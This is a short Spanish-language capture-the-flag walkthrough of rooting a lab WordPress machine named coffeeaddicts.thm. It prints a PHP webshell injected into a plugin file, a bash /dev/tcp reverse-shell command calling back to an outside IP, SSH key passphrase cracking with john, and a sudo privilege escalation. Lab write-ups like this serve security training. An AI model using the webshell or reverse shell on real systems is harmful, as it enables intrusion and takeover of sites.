Enumeramos puertos (22, 80 — WordPress). El sitio pide añadir el dominio coffeeaddicts.thm al /etc/hosts. En un comentario del blog se menciona que la contraseña está publicada en el post; bajo una foto hay un texto que usamos para entrar a wp-login.php.
En el dashboard, el editor de plugins está habilitado; inyectamos una webshell en akismet.php:
<?php
system($_GET['cmd']);
?>http://coffeeaddicts.thm/wordpress/wp-content/plugins/akismet/akismet.php?cmd=id
# reverse shell:
...akismet.php?cmd=bash -c "bash -i >& /dev/tcp/192.168.1.10/1234 0>&1"La shell es restringida; escapamos y la estabilizamos (Tratamiento de la TTY):
script /dev/null -c bash
export TERM=xtermEn el home encontramos la primera flag y una id_rsa de otro usuario (badbyte, el ciberdelincuente que vulneró el blog). Crackeamos su passphrase con john y entramos por SSH:
❯ ssh badbyte@192.168.1.50 -i id_rsaRevisamos sudo -l:
User badbyte may run the following commands on CoffeeAdicts:
(root) /opt/BadByte/shell/opt/BadByte/shell genera una shell de root; lo ejecutamos y obtenemos la flag final.
Fin.